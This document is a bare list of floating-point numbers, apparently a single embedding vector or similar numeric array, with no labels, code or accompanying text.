0.010408297181129456, -0.01016298308968544, 0.0009444565512239933, 0.016989704221487045, -0.027993762865662575, -0.00793413631618023, -0.011880177073180676, -0.005417921580374241, 0.0006535849533975124, -0.016078541055321693, -0.0002731301647145301, 0.004913276992738247, 0.01942882128059864, 0.021307220682501793, 0.017886850982904434, -0.0029279906302690506, 0.0019204533891752362, -0.006171383894979954, -0.009321908466517925, -0.004482225980609655, 0.027348939329385757, 0.002779050264507532, 0.0032959606032818556, 0.024615446105599403, -0.002032596617937088, 0.00390749191865325, -0.002523223403841257, 0.005586136598140001, -0.0021587577648460865, -0.017171937972307205, 0.020536234602332115, -0.010352225042879581, -0.002409328008070588, 0.01822328008711338, -0.006910828873515129, -0.040203358978033066, 0.019933465868234634, -0.00039841522811912, -0.009188738651573658, -0.003946041222661734, -0.0033695546444505453, -0.01893819309771061, -0.019148463383316994, -0.008410745300352573, 0.0024566384963691235, 0.019989537075161934, 0.022694993764162064, -0.023437941446900368, -0.01605050452053547, 0.015153358690440655, -0.002305945847183466, -0.006360625848174095, 0.012959555722773075, -0.004415641073137522, 0.007331365719437599, 0.020788557827472687, 0.010786780156195164, -0.023648211732506752, -0.0035027246922254562, 0.029073141515254974, -0.002190298167988658, -0.02176981046795845, 0.00913967564702034, 0.01220959797501564, -0.028792783617973328, 0.010443341918289661, -0.001407047500833869, 0.032072972506284714, 0.02783956564962864, -0.020017573609948158, 0.010317180305719376, 0.015069250948727131, -0.010520439594984055, 0.0006899439031258225, 0.013688487000763416, -0.008592978119850159, 0.011747007258236408, -0.037792280316352844, -0.00422289501875639, 0.01470478530973196, 0.02767135016620159, -0.006655002012848854, 0.021419363096356392, -0.0008726147934794426, -0.002185041317716241, 0.000827494659461081, -0.0018100623274222016, -0.00390749191865325, 0.03288601338863373, -0.021811865270137787, 0.02694241888821125, 0.00011444307892816141, 0.010064858011901379, -0.0019134444883093238, -0.012826385907828808, 0.0437639094889164, 0.03639049082994461, 0.021909991279244423, 0.00603120494633913, -0.007653777953237295, -0.01857372745871544, -0.006003169342875481, 0.02591911144554615, -0.010464368388056755, 0.009455079212784767, -0.02699849009513855, 0.014291257597506046, -0.030222609639167786, 0.010716690681874752, 0.02514812722802162, -0.0033380144741386175, -0.014424427412450314, 0.018321406096220016, -0.008536905981600285, -0.038156744092702866, -0.019414803013205528, -0.02021382376551628, 0.003576318733394146, -0.0015603683423250914, -0.011929240077733994, -0.02019980549812317, 0.0021973070688545704, -0.00008629774674773216, -0.02657795324921608, 0.015475770458579063, -0.022120259702205658, -0.010387269780039787, -0.017059793695807457, -0.04096032679080963, 0.007394446525722742, -0.009735437110066414, 0.0004209752951283008, -0.010905932635068893, -0.02694241888821125, -0.017606493085622787, 0.010380260646343231, 0.009896643459796906, -0.017059793695807457, -0.015475770458579063, -0.00823552068322897, -0.026353666558861732, -0.013548308052122593, -0.018475603312253952, -0.014382373541593552, -0.015784164890646935, 0.0029069636948406696, -0.013464200310409069, -0.013807639479637146, -0.00347994570620358, -0.01467674970626831, 0.0012712490279227495, -0.0009321909165009856, -0.006220446899533272, -0.0041948589496314526, 0.010324189439415932, 0.021195076406002045, 0.03291404992341995, -0.03145618736743927, 0.029073141515254974, -0.009181729517877102, 0.011347496882081032, 0.01780274324119091, -0.029437607154250145, -0.007408464327454567, 0.008915389887988567, 0.007765921298414469, 0.023143567144870758, -0.010064858011901379, 0.0030068412888795137, 0.006676028948277235, -0.01666729338467121, -0.005337318405508995, -0.010240081697702408, 0.01001579500734806, 0.013071699067950249, 0.012735269963741302, 0.020550252869725227, 0.01906435564160347, -0.004710017237812281, -0.03543727099895477, -0.0028228561859577894, 0.0026511368341743946, -0.0018048057099804282, -0.009090613573789597, 0.02369026467204094, 0.010029813274741173, 0.006574398837983608, 0.0025863039772957563, -0.0046995035372674465, -0.0016970429569482803, 0.002966539701446891, 0.008424762636423111, -0.01340812910348177, -0.008852308616042137, 0.015531842596828938, 0.0012326998403295875, 0.014830946922302246, -0.0017338399775326252, -0.00291747716255486, 0.004352560266852379, -0.020354002714157104, -0.010492403991520405, -0.008550924248993397, 0.0037427814677357674, 0.008803246542811394, 0.0013658698881044984, -0.0073103392496705055, -0.00637464364990592, -0.0016655026702210307, -0.01155075617134571, 0.004278966225683689, 0.014858982525765896, -0.00559314526617527, -0.018013011664152145, -0.012686206959187984, -0.019765250384807587, -0.010604547336697578, -0.009153693914413452, 0.021573560312390327, 0.022232402116060257, 0.014410409145057201, -0.005137563217431307, 0.02122311294078827, -0.008831282146275043, 0.025582682341337204, -0.003914501052349806, -0.006697055418044329, 0.004674972500652075, -0.005326805170625448, 0.014606660231947899, 0.004836178384721279, -0.005067473743110895, 0.018447566777467728, 0.002446125028654933, -0.030110467225313187, 0.011074147187173367, -0.0006115312571637332, 0.010043831542134285, 0.009069586172699928, -0.012882457114756107, 0.01990542933344841, 0.012335759587585926, -0.01464871410280466, 0.01628880947828293, -0.0038198798429220915, 0.012097454629838467, 0.01575612835586071, -0.03420369699597359, -0.0005383752868510783, -0.0020974294748157263, 0.009847580455243587, 0.0059821424074471, 0.012651162222027779, -0.002211325103417039, 0.0019257101230323315, 0.0005905043799430132, -0.0021254653111100197, -0.017956940457224846, 0.006935359910130501, 0.004587360192090273, -0.005940088536590338, -0.01827935129404068, -0.0059716287069022655, 0.0208025760948658, -0.014844964258372784, -0.01811113767325878, 0.00823552068322897, -0.006227455567568541, -0.013218887150287628, -0.0057403333485126495, -0.005288255866616964, -0.01103910245001316, -0.00022647682635579258, 0.0003397152468096465, -0.01377259474247694, -0.010478386655449867, 0.022807136178016663, 0.019386766478419304, 0.024965893477201462, 0.0032959606032818556, 0.013667460530996323, -0.003458918770775199, 0.006125825922936201, -0.0014438445214182138, -0.020129716023802757, 0.0017942922422662377, -0.006847748067229986, -0.013975854031741619, 0.00947610568255186, 0.019765250384807587, 0.0054845064878463745, -0.02026989497244358, -0.0047415574081242085, -0.022694993764162064, -0.010029813274741173, 0.0023812921717762947, -0.002439115894958377, 0.002388301072642207, -0.01851765625178814, 0.004107247106730938, -0.0028596532065421343, 0.011312452144920826, 0.004450685810297728, -0.002929742680862546, -0.022709012031555176, 0.03019457496702671, -0.04143693670630455, 0.010127938352525234, 0.019653107970952988, 0.013295985758304596, -0.00500789750367403, 0.004944817163050175, -0.001564748934470117, 0.006725091487169266, -0.015405680984258652, 0.0019835340790450573, -0.00003518166340654716, -0.016765417531132698, -0.02206418663263321, -0.021629631519317627, -0.0023830444552004337, 0.0187559612095356, 0.015069250948727131, -0.01755042001605034, -0.004359569400548935, -0.000752586463931948, 0.016527114436030388, 0.023297762498259544, 0.012784332036972046, -0.0038584291469305754, 0.015461752191185951, -0.005235688760876656, 0.02513410896062851, -0.003697223262861371, 0.002521471120417118, -0.007303330115973949, -0.008347664028406143, 0.003131250152364373, -0.010478386655449867, -0.020185787230730057, 0.010954995639622211, -0.0009260580409318209, -0.0006605939124710858, 0.009721418842673302, -0.004664458800107241, -0.0009689878788776696, -0.006686542183160782, -0.004114256240427494, 0.0017653802642598748, -0.005158590152859688, -0.006115312222391367, 0.029970288276672363, -0.008466816507279873, -0.045193735510110855, -0.018727924674749374, 0.03333458676934242, 0.02268097549676895, -0.006434219889342785, -0.0020606324542313814, -0.015069250948727131, -0.018083101138472557, 0.004261443857103586, -0.008417753502726555, -0.01635889895260334, 0.02273704670369625, 0.009994768537580967, -0.011144236661493778, -0.01539166271686554, 0.019625071436166763, 0.004366578534245491, 0.0038409067783504725, 0.03302619233727455, -0.01022606436163187, -0.00563870370388031, -0.01586827263236046, 0.003206596476957202, -0.026115363463759422, -0.0020413578022271395, 0.012013346888124943, 0.005267228931188583, 0.001152972923591733, 0.03784835338592529, 0.004019635263830423, 0.006136339157819748, -0.01732613518834114, 0.009791509248316288, 0.004307002294808626, -0.0098615987226367, -0.009924679063260555, 0.014606660231947899, 0.021839899942278862, 0.01628880947828293, -0.016611220315098763, 0.004899258725345135, -0.002153501147404313, 0.01809711940586567, 0.007836010307073593, -0.0062660048715770245, -0.005084996111690998, 0.009153693914413452, 0.028736712411046028, -0.010954995639622211, -0.0060347095131874084, -0.029970288276672363, 0.01113021932542324, -0.0032977128867059946, -0.02856849692761898, -0.007380428723990917, 0.02483973279595375, -0.029633857309818268, -0.006430715322494507, -0.01037325244396925, -0.022596867755055428, -0.0031592859886586666, -0.0029034591279923916, 0.038577284663915634, -0.02423696219921112, -0.002206068253144622, -0.0005475745419971645, 0.000729369290638715, -0.02639572136104107, -0.0031330024357885122, -0.04107246920466423, -0.019162479788064957, -0.0029595308005809784, 0.027222776785492897, 0.016821490600705147, 0.008186458609998226, -0.009819544851779938, 0.002365522086620331, 0.016947651281952858, 0.011074147187173367, 0.003129497868940234, -0.010709681548178196, 0.009875616058707237, 0.023381870239973068, 0.014620678499341011, 0.0004476969479583204, -0.01241285726428032, 0.0010294400854036212, -0.013450182974338531, 0.00008668105147080496, -0.035212986171245575, -0.019022300839424133, -0.003854924812912941, -0.005445957183837891, -0.001976524945348501, -0.006577903404831886, -0.011747007258236408, 0.0003747600130736828, -0.02940957061946392, 0.008978470228612423, -0.0072612762451171875, 0.038633354008197784, -0.0156860388815403, 0.027110634371638298, -0.01115825492888689, 0.00018770854512695223, 0.024811698123812675, -0.01919051632285118, -0.021966062486171722, 0.0031995875760912895, -0.0033134829718619585, 0.011109191924333572, -0.0002970044151879847, 0.0029227337799966335, -0.0083546731621027, -0.024699553847312927, -0.0017093087080866098, -0.023297762498259544, -0.017410241067409515, 0.02050819993019104, -0.004545306786894798, -0.0026511368341743946, 0.0030944531317800283, 0.01731211692094803, -0.02621348761022091, 0.0016847773222252727, 0.005288255866616964, 0.034792449325323105, 0.014249203726649284, -0.017592474818229675, -0.011571783572435379, -0.005337318405508995, 0.0036691874265670776, 0.0022638922091573477, 0.023381870239973068, 0.0049763573333621025, -0.004275462124496698, -0.015573895536363125, 0.004562829155474901, -0.02339588850736618, -0.004650440998375416, 0.007149132899940014, 0.0039004830177873373, 0.008046279661357403, -0.01612059399485588, 0.006111808121204376, -0.016092559322714806, -0.000025790761355892755, 0.0007337498827837408, 0.010779771022498608, 0.0015542355831712484, -0.015279519371688366, -0.004247426055371761, 0.020718468353152275, 0.01575612835586071, -0.00979851745069027, 0.01494309026747942, -0.01617666520178318, 0.009966732934117317, 0.009924679063260555, 0.011116201058030128, -0.013709514401853085, -0.0011652385583147407, -0.007709849625825882, 0.00854391511529684, 0.00009653739107307047, 0.009104630909860134, -0.007920118048787117, 0.003953049890697002, -0.005572118330746889, -0.009342935867607594, 0.015980415046215057, 0.005049951374530792, -0.0009313147747889161, -0.017522385343909264, 0.008642040193080902, -0.019274624064564705, 0.017872832715511322, 0.012160534970462322, 0.0002856148639693856, 0.0031592859886586666, -0.0057333242148160934, -0.007983198389410973, -0.0032153576612472534, 0.004184345714747906, 0.00965132936835289, -0.007639759685844183, -0.015055233612656593, -0.011424595490098, -0.0062660048715770245, -0.004864213988184929, -0.009805526584386826, 0.017045775428414345, 0.008824273012578487, 0.007408464327454567, -0.001632210216484964, 0.008992488496005535, 0.0025021967012435198, 0.009391998872160912, 0.01743827760219574, -0.008130386471748352, -0.0005028924788348377, -0.0036726919934153557, -0.008291592821478844, 0.0012274431064724922, 0.011775042861700058, 0.007233240641653538, -0.0062519870698452, 0.011852141469717026, -0.0035360173787921667, 0.004937808029353619, 0.0016313340747728944, -0.0032574112992733717, 0.008606995455920696, -0.032437440007925034, 0.014003890566527843, 0.003423874033614993, 0.009188738651573658, 0.0010977773927152157, -0.01560193207114935, -0.0012248146813362837, 0.030334753915667534, 0.00886632688343525, -0.002386548789218068, 0.033474765717983246, -0.0208025760948658, 0.00845279823988676, -0.011445621959865093, 0.008319628424942493, -0.028638586401939392, 0.0078149838373065, 0.018251316621899605, 0.005670243874192238, -0.009672356769442558, 0.02833019196987152, 0.019835339859128, -0.00010579139780020341, -0.00977048184722662, -0.015798183158040047, -0.0008932035998441279, -0.030755290761590004, 0.002484674099832773, -0.0176765825599432, -0.009181729517877102, -0.006097789853811264, 0.002249874174594879, -0.024937858805060387, -0.0025705338921397924, -0.020942755043506622, -0.02255481481552124, 0.021335255354642868, 0.00019296526443213224, 0.015251483768224716, -0.03131600841879845, -0.010597538203001022, 0.00586298992857337, 0.017171937972307205, 0.013639424927532673, -0.016134612262248993, -0.0018205757951363921, -0.01238482166081667, 0.009882625192403793, 0.02056427113711834, 0.006395670585334301, -0.004566333722323179, 0.015139340423047543, -0.002679172670468688, 0.026620008051395416, 0.00356405321508646, 0.010464368388056755, -0.03204493969678879, -0.009293872863054276, 0.00207465048879385, 0.014816928654909134, -0.016765417531132698, 0.010092893615365028, -0.004079211037606001, -0.01340812910348177, -0.01103910245001316, -0.03801656514406204, 0.0012984087225049734, -0.014634695835411549, 0.005134058650583029, 0.0034151128493249416, -0.00971441064029932, 0.027278849855065346, 0.019442837685346603, -0.004033653065562248, 0.016807472333312035, 0.018125155940651894, -0.002912220312282443, -0.008501861244440079, 0.007138619665056467, 0.027390992268919945, -0.00671808235347271, -0.0013334534596651793, -0.005302273668348789, -0.021797847002744675, 0.01343616470694542, -0.010113921016454697, 0.007177168969064951, 0.0019835340790450573, -0.01809711940586567, -0.041493009775877, -0.0033537845592945814, -0.0024198414757847786, 0.026353666558861732, 0.0023515040520578623, 0.0055055334232747555, -0.010219055227935314, -0.00003912419924745336, 0.00040345292654819787, 0.031231898814439774, -0.009511150419712067, -0.0030226113740354776, -0.0109409773722291, 0.04701606556773186, 0.025176163762807846, 0.002715969691053033, -0.004815151449292898, 0.001574386260472238, 0.0022656444925814867, 0.037736207246780396, 0.01712988317012787, -0.005172607954591513, 0.025218216702342033, -0.00669004675000906, 0.022835172712802887, 0.027587242424488068, -0.03036278858780861, -0.0011442117393016815, -0.004219390451908112, 0.0015332086477428675, 0.01157879177480936, 0.002149996580556035, 0.017536403611302376, 0.0031995875760912895, 0.0018205757951363921, -0.0018030534265562892, 0.015840236097574234, 0.0016488564433529973, -0.010436332784593105, -0.013036654330790043, -0.033474765717983246, 0.007338374853134155, -0.018685871735215187, 0.019751232117414474, -0.024881787598133087, -0.010835843160748482, -0.011431603692471981, -0.034792449325323105, -0.022765083238482475, -0.007618733216077089, 0.00547048868611455, -0.024068748578429222, 0.01223763357847929, -0.011445621959865093, 0.01145263109356165, -0.004352560266852379, -0.004019635263830423, 0.02015775255858898, 0.0119642848148942, 0.015840236097574234, -0.03288601338863373, -0.006977413780987263, -0.022470707073807716, 0.005537073593586683, -0.0010732461232692003, 0.0026704114861786366, -0.005428434815257788, -0.034427981823682785, 0.02718072384595871, -0.012104463763535023, -0.00434555159881711, -0.03336261957883835, 0.0022165817208588123, 0.02729286625981331, 0.011852141469717026, 0.008165431208908558, -0.014109024778008461, -0.028848854824900627, -0.0026931907050311565, -0.007576679345220327, 0.004366578534245491, -0.018545692786574364, 0.008873336017131805, -0.00018705146794673055, 0.010036822408437729, -0.016583185642957687, -0.010520439594984055, -0.0026493845507502556, 0.008684094063937664, 0.01690559647977352, 0.015658004209399223, 0.013359066098928452, -0.025050001218914986, -0.00886632688343525, 0.007751903031021357, 0.00009768729796633124, -0.01924658752977848, 0.012433884665369987, -0.003774321870878339, -0.0015507311327382922, -0.004692494869232178, -0.009686374105513096, -0.007012458518147469, 0.009658338502049446, 0.013373084366321564, -0.003753294935449958, -0.000109952969069127, -0.006721586920320988, 0.0016768922796472907, 0.000010232799468212761, -0.01690559647977352, -0.016737382858991623, -0.007036990020424128, -0.008789228275418282, -0.004752070643007755, 0.004604883026331663, 0.00031365070026367903, 0.016274791210889816, -0.01464871410280466, 0.018910158425569534, 0.0009751207544468343, -0.012546028010547161, 0.0054599749855697155, -0.009399007074534893, -0.007765921298414469, -0.004965844098478556, -0.008200475946068764, -0.020171768963336945, -0.003425626317039132, 0.02045212872326374, -0.016078541055321693, -0.010695664212107658, 0.010036822408437729, 0.016933633014559746, -0.014270230196416378, -0.016513096168637276, -0.02814796008169651, -0.022512760013341904, -0.0013825162313878536, -0.008698112331330776, -0.01499916147440672, 0.006388661451637745, 0.009076595306396484, -0.00923079252243042, 0.01610657572746277, -0.005372363142669201, -0.02195204421877861, 0.013877728953957558, 0.025652771815657616, -0.008529896847903728, -0.0023742832709103823, -0.017452295869588852, -0.007758912164717913, 0.011459640227258205, -0.006991431582719088, -0.0028841844759881496, -0.002800077199935913, 0.01708783023059368, -0.0075836884789168835, 0.023956604301929474, -0.00551955122500658, -0.004342047031968832, -0.01599443331360817, -0.01491505466401577, -0.02026989497244358, 0.004944817163050175, 0.015728093683719635, 0.01172597985714674, -0.035269055515527725, 0.034540124237537384, -0.009847580455243587, -0.007765921298414469, 0.002013321965932846, -0.005092005245387554, -0.007191186770796776, -0.00590854836627841, 0.00803226139396429, 0.012321741320192814, -0.021321238949894905, 0.01314178854227066, 0.010786780156195164, 0.01371652353554964, 0.016148630529642105, -0.00021716805349569768, 0.021209094673395157, 0.004962339531630278, 0.0031768083572387695, -0.01822328008711338, -0.004639927763491869, -0.0005063969292677939, -0.0067986855283379555, -0.007990207523107529, 0.019106408581137657, -0.0014228177024051547, 0.014606660231947899, 0.010275126434862614, -0.001994047313928604, -0.0006623461376875639, 0.002794820349663496, 0.018013011664152145, -0.014382373541593552, 0.0031172323506325483, 0.012125490233302116, 0.014802911318838596, 0.029858144000172615, 0.01586827263236046, -0.006332589779049158, 0.012279687449336052, -0.010604547336697578, 0.003462423337623477, 0.007040494121611118, 0.0046995035372674465, 0.018237298354506493, 0.013667460530996323, 0.006742613855749369, 0.024068748578429222, -0.033110298216342926, -0.0041703274473547935, -0.008459807373583317, 0.0035097338259220123, -0.007857037708163261, -0.0013036654563620687, 0.015826217830181122, -0.0008980222628451884, -0.013548308052122593, -0.014291257597506046, -0.013562326319515705, -0.004415641073137522, -0.014109024778008461, -0.0036306381225585938, -0.01827935129404068, -0.0030191070400178432, 0.006669019814580679, -0.02664804272353649, 0.0002687495725695044, -0.012994600459933281, 0.0008428267319686711, -0.01241285726428032, 0.023367851972579956, -0.0029209814965724945, -0.0004612767952494323, -0.022835172712802887, -0.007786947768181562, 0.020354002714157104, -0.004583856090903282, -0.005084996111690998, -0.026311613619327545, -0.020368020981550217, -0.007604714948683977, -0.013043663464486599, -0.0014552341308444738, 0.0010031565325334668, 0.0047170259058475494, -0.002109695225954056, 0.00911164004355669, 0.004692494869232178, 0.014578624628484249, 0.00769583135843277, 0.01136151421815157, 0.022358562797307968, -0.017634527757763863, -0.023409906774759293, 0.034427981823682785, 0.006746118422597647, 0.0025162145029753447, 0.015531842596828938, -0.015139340423047543, 0.011978302150964737, 0.022386599332094193, -0.005694775376468897, 0.012041383422911167, 0.008908380754292011, 0.004506757482886314, 0.00832663755863905, -0.0013360818848013878, -0.030082430690526962, -0.015433716587722301, 0.002565277274698019, 0.0033327576238662004, -0.000008651677489979193, -0.008635031059384346, -0.015069250948727131, 0.008943425491452217, 0.021755794063210487, 0.028428317978978157, 0.02326972782611847, -0.009959723800420761, -0.0078149838373065, -0.0011065385770052671, 0.0007008953834883869, -0.0009847580222412944, 0.001272125169634819, 0.0029998323880136013, -0.027110634371638298, 0.022891243919730186, -0.030138501897454262, -0.00685826176777482, 0.009658338502049446, -0.006735604722052813, 0.024194909259676933, 0.00844579003751278, 0.028582515195012093, 0.0001397410233039409, 0.006395670585334301, 0.0059821424074471, -0.012335759587585926, 0.007205204572528601, -0.015167376957833767, 0.01979328691959381, -0.021938025951385498, -0.002192050451412797, -0.0013728789053857327, -0.027517152950167656, 0.0035027246922254562, 0.007359401788562536, 0.014662731438875198, 0.003914501052349806, 0.00664448831230402, 0.0167093463242054, -0.015826217830181122, -0.0019064354710280895, 0.009644321165978909, -0.02105489745736122, 0.0098615987226367, 0.0030821876134723425, -0.014179114252328873, -0.002852644305676222, 0.006469264626502991, -0.0033345099072903395, -0.010043831542134285, -0.016499077901244164, -0.0018013011431321502, 0.01581219956278801, -0.02350803278386593, 0.021909991279244423, -0.017354169860482216, -0.02328374609351158, -0.007317347917705774, -0.009749455377459526, 0.010219055227935314, 0.014010898768901825, -0.002037853468209505, 0.01232875045388937, -0.001876647467724979, -0.0016874056309461594, 0.0028281130362302065, 0.0072823031805455685, -0.0088382912799716, 0.012083436362445354, 0.01428424846380949, 0.02025587670505047, 0.00871913880109787, 0.0041948589496314526, 0.020297931507229805, 0.014830946922302246, 0.006157366093248129, -0.014326302334666252, -0.021251149475574493, 0.020494181662797928, -0.01743827760219574, 0.015658004209399223, 0.004769593011587858, 0.0016068026889115572, -0.015980415046215057, -0.023788390681147575, 0.001329949009232223, 0.014109024778008461, 0.015952378511428833, -0.0039810859598219395, 0.006609443575143814, 0.01882605068385601, -0.0015717579517513514, 0.0187559612095356, -0.03325047716498375, -0.0029980801045894623, 0.008550924248993397, 0.006739109288901091, -0.029269391670823097, 0.002230599522590637, -0.0012388325994834304, 0.0008196095586754382, -0.0033923338633030653, 0.00034672420588321984, 0.0027475100941956043, 0.03036278858780861, -0.036110132932662964, 0.005558100529015064, 0.009574231691658497, -0.001994047313928604, -0.00007173226185841486, -0.0006881916779093444, -0.01467674970626831, -0.006164375226944685, 0.010751735419034958, 0.017662564292550087, 0.003171551739796996, 0.0176205113530159, -0.0072402493096888065, 0.002954274183139205, 0.023115530610084534, -0.0008752431604079902, 0.03179261460900307, -0.004072202369570732, 0.0018871609354391694, 0.015489788725972176, -0.002507453318685293, -0.008046279661357403, 0.0072612762451171875, 0.0035552920307964087, -0.020059626549482346, -0.004902763292193413, 0.010604547336697578, -0.019569000229239464, -0.002171023515984416, -0.006409688387066126, -0.007047503255307674, -0.01701774075627327, -0.016527114436030388, 0.005799909587949514, -0.0013159310910850763, -0.019835339859128, -0.006073258817195892, -0.0021079429425299168, -0.01209044549614191, 0.002777297981083393, 0.009784500114619732, -0.003521999344229698, -0.01732613518834114, 0.002407575724646449, -0.0037567992694675922, 0.004100237973034382, 0.012903484515845776, 0.020227842032909393, -0.005403903778642416, -0.002538993488997221, 0.016134612262248993, 0.004377091769129038, -0.014480498619377613, -0.0022341040894389153, 0.012910493649542332, -0.02116704173386097, 0.018868103623390198, 0.0015507311327382922, -0.011473657563328743, 0.020900700241327286, 0.00637464364990592, 0.00637464364990592, 0.012525000609457493, -0.01084986049681902, 0.006381652783602476, 0.018798014149069786, -0.03540923446416855, -0.0012134251883253455, 0.02248472534120083, -0.022148294374346733, 0.0050184112042188644, 0.015419699251651764, -0.00020194548415020108, -0.011810087598860264, 0.008312619291245937, 0.017354169860482216, -0.013422147370874882, -0.017844796180725098, -0.01292451098561287, 0.009420034475624561, -0.010905932635068893, -0.003711241064593196, -0.002761527895927429, 0.012966564856469631, -0.004864213988184929, -0.012903484515845776, 0.007408464327454567, -0.006728596054017544, -0.011627854779362679, 0.0011512207565829158, -0.011957275681197643, -0.00014729755639564246, 0.028456352651119232, -0.011761024594306946, 0.01564398594200611, -0.0016024220967665315, -0.02376035414636135, -0.002034348901361227, -0.017592474818229675, 0.0004652193165384233, 0.023115530610084534, -0.00637464364990592, 0.0011398311471566558, 0.0014123042346909642, -0.015447734855115414, 0.0070089539512991905, 0.011648881249129772, -0.011081156320869923, 0.025246253237128258, -0.010583520866930485, 0.015840236097574234, -0.006963395979255438, -0.005859485361725092, 0.018924176692962646, -0.004065193235874176, -0.0008809379069134593, -0.015854254364967346, -0.013190851546823978, 0.00390749191865325, 0.005246201995760202, 0.00035460927756503224, -0.02224642038345337, 0.007373419590294361, 0.0012756296200677752, 0.010534457862377167, -0.012216607108712196, -0.02189597301185131, -0.02153150737285614, 0.009609276428818703, 0.019877392798662186, 0.0002945951127912849, 0.002053623553365469, 0.006325581111013889, 0.008095341734588146, -0.017242027446627617, 0.019078372046351433, -0.00437358720228076, -0.004587360192090273, -0.026087326928973198, 0.00017171938088722527, 0.0034869546070694923, -0.00934994500130415, 0.011992320418357849, 0.001210796763189137, 0.0057578557170927525, -0.01719997264444828, -0.02171373926103115, 0.01382866594940424, -0.006052231881767511, 0.0070545123890042305, -0.014277239330112934, 0.0014193132519721985, -0.012426875531673431, 0.010681645944714546, -0.003816375508904457, -0.008789228275418282, 0.0020939249079674482, -0.005267228931188583, 0.024264998733997345, 0.019569000229239464, -0.006367634981870651, -0.012286696583032608, -0.027713404968380928, -0.007422482129186392, -0.002736996626481414, -0.006837234832346439, -0.009314900264143944, 0.009020524099469185, 0.013478218577802181, -0.0028246084693819284, -0.006746118422597647, 0.015209429897367954, -0.011081156320869923, 0.004044166300445795, 0.014438445679843426, 0.00959525816142559, -0.01707381196320057, -0.004913276992738247, -0.006676028948277235, 0.0011801326181739569, -0.012258660979568958, 0.0009602266945876181, -0.00017916638171300292, -0.006679533049464226, 0.008887353353202343, 0.023185620084404945, -0.013001609593629837, 0.004426154308021069, -0.0028473876882344484, -0.016246754676103592, 0.017956940457224846, -0.007906099781394005, -0.002036101184785366, 0.018475603312253952, 0.008992488496005535, 0.011522720567882061, -0.00043915476999245584, 0.00684073893353343, 0.002442620461806655, 0.004769593011587858, -0.0024180891923606396, 0.015952378511428833, -0.044044267386198044, 0.008908380754292011, -0.009384989738464355, 0.01822328008711338, -0.0022235906217247248, 0.015237466432154179, -0.028848854824900627, -0.0031610382720828056, 0.0040056174620985985, 0.012370804324746132, -0.003812870942056179, -0.01725604571402073, -0.02350803278386593, 0.010835843160748482, 0.008908380754292011, -0.0036271337885409594, -0.004639927763491869, 0.016218720003962517, -0.010457359254360199, 0.0038058620411902666, -0.0037427814677357674, 0.012980583123862743, 0.010240081697702408, -0.03162439912557602, -0.00016646266158204526, 0.010008786804974079, -0.011095174588263035, 0.002309450414031744, -0.009335926733911037, 0.0021272175945341587, 0.013218887150287628, 0.005624685436487198, -0.004454190377146006, -0.02476964332163334, 0.00911164004355669, -0.004163318779319525, -0.002849139738827944, 0.016933633014559746, 0.0017364684026688337, -0.011585800908505917, 0.013078708201646805, 0.009160703048110008, -0.023409906774759293, 0.011999329552054405, 0.011704953387379646, 0.0098615987226367, -0.013520272448658943, -0.030699219554662704, 0.0031330024357885122, -0.008375699631869793, 0.030446896329522133, 0.011144236661493778, 0.008824273012578487, -0.023017404600977898, -0.011025085113942623, -0.016499077901244164, 0.006297545041888952, -0.0033940859138965607, 0.0026879338547587395, -0.003777826204895973, -0.007864046841859818, -0.010520439594984055, -0.0433153361082077, 0.009868606925010681, 0.027867602184414864, 0.02862456813454628, -0.01635889895260334, -0.0067776585929095745, 0.01382866594940424, 0.0018275848124176264, 0.002956026466563344, -0.0027317397762089968, 0.007093061693012714, 0.014059961773455143, -0.01166990865021944, -0.012314732186496258, 0.017830779775977135, 0.0035920890513807535, 0.023311780765652657, 0.008494852110743523, 0.00037673127371817827, 0.005141067784279585, -0.011417586356401443, 0.006767145358026028, 0.017956940457224846, 0.0001178380407509394, 0.0034010950475931168, 0.029970288276672363, 0.007688822690397501, -0.022036151960492134, 0.0010714938398450613, -0.02591911144554615, 0.037007275968790054, -0.002814095001667738, -0.007625741884112358, -0.0067531270906329155, 0.0125039741396904, -0.012700224295258522, -0.003066417295485735, 0.014207149855792522, 0.007660786621272564, 0.025302324444055557, -0.02279311791062355, 0.010611556470394135, 0.022835172712802887, -0.00684073893353343, 0.020396055653691292, 0.014774874784052372, -0.004695999436080456, 0.019050337374210358, 0.000723674485925585, -0.009469096548855305, -0.018994266167283058, 0.002274405676871538, -0.012342767789959908, 0.01172597985714674, 0.012202588841319084, 0.027713404968380928, 0.016134612262248993, 0.009511150419712067, -0.012798350304365158, 0.006630470510572195, 0.0014753848081454635, -0.005358345340937376, -0.014480498619377613, -0.007331365719437599, 0.006171383894979954, -0.008621013723313808, 0.003110223449766636, -0.001976524945348501, -0.005691270809620619, 0.020339984446763992, 0.016204701736569405, 0.025400448590517044, 0.00977048184722662, 0.00820748507976532, 0.005866494495421648, 0.02376035414636135, 0.0165972039103508, -0.02436312474310398, 0.0019046833040192723, -0.013218887150287628, -0.0218819547444582, 0.004012626130133867, -0.014368356205523014, 0.00000376799721379939, -0.02116704173386097, -0.008431771770119667, 0.010296153835952282, 0.023718301206827164, 0.003868942614644766, -0.003036629408597946, -0.0032398889306932688, 0.007366410922259092, 0.008656058460474014, -0.014578624628484249, -0.00998775940388441, -0.011543747037649155, 0.0028929458931088448, 0.012581072747707367, 0.02718072384595871, -0.006318571977317333, -0.012293705716729164, -0.04463301971554756, 0.021629631519317627, 0.026073308661580086, -0.03403548151254654, 0.009910660795867443, -0.0002648070512805134, -0.027166705578565598, -0.007878064177930355, 0.012532009743154049, 0.031175827607512474, 0.019526945427060127, 0.0034010950475931168, -0.0020028087310492992, 0.00044791598338633776, -0.00845279823988676, 0.005400399211794138, -0.015013179741799831, 0.0009672356536611915, -0.0036061068531125784, 0.004292984493076801, 0.01031017117202282, -0.0033660500776022673, 0.006483282428234816, 0.009763472713530064, -0.022470707073807716, -0.0013457192108035088, 0.001212549046613276, -0.002013321965932846, -0.02868063934147358, 0.0031382592860609293, -0.01042932365089655, -0.003320491872727871, 0.010085884481668472, -0.00766779575496912, -0.001971268327906728, 0.020956773310899734, 0.0027212263084948063, -0.014929072000086308, 0.005729820113629103, -0.010198027826845646, -0.012517991475760937, -0.04045568406581879, 0.0004936932236887515, 0.003500972641631961, -0.0020483669359236956, 0.009973742067813873, -0.00820748507976532, -0.008943425491452217, -0.02026989497244358, 0.004247426055371761, 0.01954096369445324, 0.00535133620724082, -0.018615782260894775, -0.01464871410280466, 0.0002729111583903432, 0.019022300839424133, -0.0022761577274650335, 0.0024741608649492264, 0.011999329552054405, -0.0012291952734813094, 0.015924343839287758, -0.005077986977994442, -0.010751735419034958, -0.006511318497359753, 0.010092893615365028, 0.01798497699201107, 0.008621013723313808, 